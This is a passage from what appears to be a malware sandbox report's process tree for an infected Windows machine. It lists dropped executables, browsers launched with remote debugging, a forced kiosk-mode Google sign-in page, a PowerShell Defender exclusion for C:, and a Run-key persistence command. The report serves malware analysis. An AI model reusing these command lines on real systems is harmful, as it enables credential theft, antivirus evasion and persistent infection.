        "C:\Users\Admin\AppData\Local\Temp\10367950101\202a17038f.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2284
      - C:\Users\Admin\AppData\Local\Temp\10367960101\d291a068d0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10367960101\d291a068d0.exe"
        6⤵
        
        PID:4460
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
        7⤵
        Uses browser remote debugging
        
        PID:2208
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x84,0xfc,0x100,0xd8,0x104,0x7ffe3016dcf8,0x7ffe3016dd04,0x7ffe3016dd10
        8⤵
        
        PID:3884
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1768,i,9514024906106689169,18339160876125645351,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2120 /prefetch:3
        8⤵
        
        PID:4820
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2092,i,9514024906106689169,18339160876125645351,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2088 /prefetch:2
        8⤵
        
        PID:3480
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2304,i,9514024906106689169,18339160876125645351,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2312 /prefetch:8
        8⤵
        
        PID:3104
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2980,i,9514024906106689169,18339160876125645351,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2996 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:5624
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3000,i,9514024906106689169,18339160876125645351,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3028 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:4276
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4212,i,9514024906106689169,18339160876125645351,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4228 /prefetch:2
        8⤵
        Uses browser remote debugging
        
        PID:4816
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4436,i,9514024906106689169,18339160876125645351,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4420 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:2912
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5164,i,9514024906106689169,18339160876125645351,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5176 /prefetch:8
        8⤵
        
        PID:5616
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
        7⤵
        Uses browser remote debugging
        
        PID:4752
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x2f4,0x7ffe3918f208,0x7ffe3918f214,0x7ffe3918f220
        8⤵
        
        PID:3532
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1916,i,4114381483003402176,11257228510215602731,262144 --variations-seed-version --mojo-platform-channel-handle=2228 /prefetch:3
        8⤵
        
        PID:4476
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2200,i,4114381483003402176,11257228510215602731,262144 --variations-seed-version --mojo-platform-channel-handle=2196 /prefetch:2
        8⤵
        
        PID:1008
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1784,i,4114381483003402176,11257228510215602731,262144 --variations-seed-version --mojo-platform-channel-handle=2848 /prefetch:8
        8⤵
        
        PID:4948
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3444,i,4114381483003402176,11257228510215602731,262144 --variations-seed-version --mojo-platform-channel-handle=3492 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:5404
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3452,i,4114381483003402176,11257228510215602731,262144 --variations-seed-version --mojo-platform-channel-handle=3540 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:2156
      - C:\Users\Admin\AppData\Local\Temp\10367970101\223af68ec4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10367970101\223af68ec4.exe"
        6⤵
        
        PID:2516
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        7⤵
        Kills process with taskkill
        
        PID:5824
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        7⤵
        Kills process with taskkill
        
        PID:4704
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
        7⤵
        Kills process with taskkill
        
        PID:4452
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM opera.exe /T
        7⤵
        Kills process with taskkill
        
        PID:5784
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM brave.exe /T
        7⤵
        Kills process with taskkill
        
        PID:3800
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
        7⤵
        
        PID:3908
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        8⤵
        
        PID:5432
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2000 -prefsLen 27099 -prefMapHandle 2004 -prefMapSize 270279 -ipcHandle 2092 -initialChannelId {13c6aa80-cac2-4812-b1af-f48dd7a76ff2} -parentPid 5432 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5432" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
        9⤵
        
        PID:2160
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2484 -prefsLen 27135 -prefMapHandle 2488 -prefMapSize 270279 -ipcHandle 2496 -initialChannelId {dac790be-94d6-4522-b2cc-0a8fde17444c} -parentPid 5432 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5432" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
        9⤵
        
        PID:5764
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3628 -prefsLen 25213 -prefMapHandle 3632 -prefMapSize 270279 -jsInitHandle 3636 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3840 -initialChannelId {a331c2e8-b438-4df9-9d3d-6d2ba26cd378} -parentPid 5432 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5432" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
        9⤵
        
        PID:3908
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4080 -prefsLen 27325 -prefMapHandle 4084 -prefMapSize 270279 -ipcHandle 4172 -initialChannelId {e67dfa48-ecee-4eee-81fe-1e70a124b4e8} -parentPid 5432 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5432" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
        9⤵
        
        PID:6016
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3116 -prefsLen 34824 -prefMapHandle 3120 -prefMapSize 270279 -jsInitHandle 1380 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 1660 -initialChannelId {c2da3d62-a1cd-433a-ab6d-cf78fffa4232} -parentPid 5432 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5432" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
        9⤵
        
        PID:6300
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5040 -prefsLen 34959 -prefMapHandle 5000 -prefMapSize 270279 -ipcHandle 2520 -initialChannelId {5c4175a2-b3aa-4a26-b090-8080309b85fc} -parentPid 5432 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5432" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
        9⤵
        
        PID:7804
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2980 -prefsLen 32900 -prefMapHandle 2740 -prefMapSize 270279 -jsInitHandle 5072 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5084 -initialChannelId {365db42f-d267-4362-bb20-9d5eb6911aaf} -parentPid 5432 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5432" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
        9⤵
        
        PID:7852
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5100 -prefsLen 32900 -prefMapHandle 5104 -prefMapSize 270279 -jsInitHandle 5108 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5116 -initialChannelId {7762d5ec-7f85-4b65-9270-ba3bcb094d41} -parentPid 5432 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5432" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
        9⤵
        
        PID:7864
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5504 -prefsLen 32952 -prefMapHandle 5508 -prefMapSize 270279 -jsInitHandle 5512 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5516 -initialChannelId {288036bf-7f26-44fc-a010-10dcec185dda} -parentPid 5432 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5432" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
        9⤵
        
        PID:7900
      - C:\Users\Admin\AppData\Local\Temp\10367980101\2472d5ad66.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10367980101\2472d5ad66.exe"
        6⤵
        
        PID:2528
      - C:\Users\Admin\AppData\Local\Temp\10367990101\e29c3b8ad3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10367990101\e29c3b8ad3.exe"
        6⤵
        
        PID:7280
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10367990101\e29c3b8ad3.exe"
        7⤵
        
        PID:7004
      - C:\Users\Admin\AppData\Local\Temp\10368000101\53ec6f7213.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10368000101\53ec6f7213.exe"
        6⤵
        
        PID:8076
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10368000101\53ec6f7213.exe"
        7⤵
        
        PID:19112
      - C:\Users\Admin\AppData\Local\Temp\10368010101\3065a77778.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10368010101\3065a77778.exe"
        6⤵
        
        PID:24428
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:19316
      - C:\Users\Admin\AppData\Local\Temp\10368020101\TbV75ZR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10368020101\TbV75ZR.exe"
        6⤵
        
        PID:24876
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:24920
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 24920 -s 496
        8⤵
        Program crash
        
        PID:25352
      - C:\Users\Admin\AppData\Local\Temp\10368030101\u75a1_003.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10368030101\u75a1_003.exe"
        6⤵
        
        PID:3856
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
        7⤵
        
        PID:25852
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:25264
        
        C:\Windows\system32\svchost.exe
        
        "C:\Windows\system32\svchost.exe"
        7⤵
        
        PID:25860
        
        C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        8⤵
        
        PID:12348
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Remove-MpPreference -ExclusionPath C:\
        9⤵
        
        PID:10884
        
        C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
        8⤵
        
        PID:27128
      - C:\Users\Admin\AppData\Local\Temp\10368040101\d75dbfaf10.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10368040101\d75dbfaf10.exe"
        6⤵
        
        PID:19684
      - C:\Users\Admin\AppData\Local\Temp\10368050101\7IIl2eE.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10368050101\7IIl2eE.exe"
        6⤵
        
        PID:16808
        
        C:\Windows\SysWOW64\CMD.exe
        
        "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
        7⤵
        
        PID:26876
      - C:\Users\Admin\AppData\Local\Temp\10368060101\Rm3cVPI.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10368060101\Rm3cVPI.exe"
        6⤵
        
        PID:7664
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10368081121\2GF9eeb.cmd"
        6⤵
        
        PID:23560
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10368081121\2GF9eeb.cmd"
        7⤵
        
        PID:23716
      - C:\Users\Admin\AppData\Local\Temp\10368090101\hYjiwV0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10368090101\hYjiwV0.exe"
        6⤵
        
        PID:4172
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:26312
      - C:\Users\Admin\AppData\Local\Temp\10368100101\hYjiwV0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10368100101\hYjiwV0.exe"
        6⤵
        
        PID:18312
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:24256
      - C:\Users\Admin\AppData\Local\Temp\10368110101\d950b77f9b.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10368110101\d950b77f9b.exe"
        6⤵
        
        PID:19344

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:424

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4320

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:1748

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:3588

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
PID:2648

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
PID:5896

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:4008

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe"
1⤵
PID:3144
- C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
  C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
  2⤵
  PID:6244
- - C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
    C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
    3⤵
    PID:7284
  - - C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
      C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
      4⤵
      PID:7224
    - - C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        5⤵
        
        PID:7432
      - C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        6⤵
        
        PID:7588
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        7⤵
        
        PID:2212
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        8⤵
        
        PID:7640
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        9⤵
        
        PID:7532
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        10⤵
        
        PID:116
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        11⤵
        
        PID:1588
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        12⤵
        
        PID:4936
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        13⤵
        
        PID:18644
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        14⤵
        
        PID:18752
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        15⤵
        
        PID:18812
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        16⤵
        
        PID:18876
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        17⤵
        
        PID:19036
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        18⤵
        
        PID:24540
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        19⤵
        
        PID:19132
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        20⤵
        
        PID:19340
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        21⤵
        
        PID:3232
        
        C:\Windows\system32\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javasupport.exe"
        22⤵
        Modifies registry key
        
        PID:19504
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javasupport.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe\"'"
        22⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:20216

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\mM4zRoPf\sHmUQoFG1f5KA3vK.exe
1⤵
PID:7784
- C:\Users\Admin\AppData\Local\Temp\mM4zRoPf\sHmUQoFG1f5KA3vK.exe
  C:\Users\Admin\AppData\Local\Temp\mM4zRoPf\sHmUQoFG1f5KA3vK.exe
  2⤵
  PID:18884
- - C:\Users\Admin\AppData\Local\Temp\JY8NyBKE\f14tGmc1aTUQtaAz.exe
    C:\Users\Admin\AppData\Local\Temp\JY8NyBKE\f14tGmc1aTUQtaAz.exe 18884
    3⤵
    PID:18916
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 18916 -s 684
      4⤵
      Program crash
      PID:24892
- - C:\Users\Admin\AppData\Local\Temp\mM4zRoPf\CJZmu1lwMKZVNG3o.exe
    C:\Users\Admin\AppData\Local\Temp\mM4zRoPf\CJZmu1lwMKZVNG3o.exe 18884
    3⤵
    PID:17156
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 17156 -s 476
      4⤵
      Program crash
      PID:11928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2528 -ip 2528
1⤵
PID:18668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 3052 -ip 3052
1⤵
PID:18688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 18916 -ip 18916
1⤵
PID:24804

C:\Windows\SysWOW64\fontdrvhost.exe
"C:\Windows\System32\fontdrvhost.exe"
1⤵
PID:25164

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 24920 -ip 24920
1⤵
PID:25204

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:25564

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe"
1⤵
PID:25348
- C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
  C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
  2⤵
  PID:26044
- - C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
    C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
    3⤵
    PID:26332
  - - C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
      C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
      4⤵
      PID:25604
    - - C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        5⤵
        
        PID:26068
      - C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        6⤵
        
        PID:25260
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        7⤵
        
        PID:25632
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        
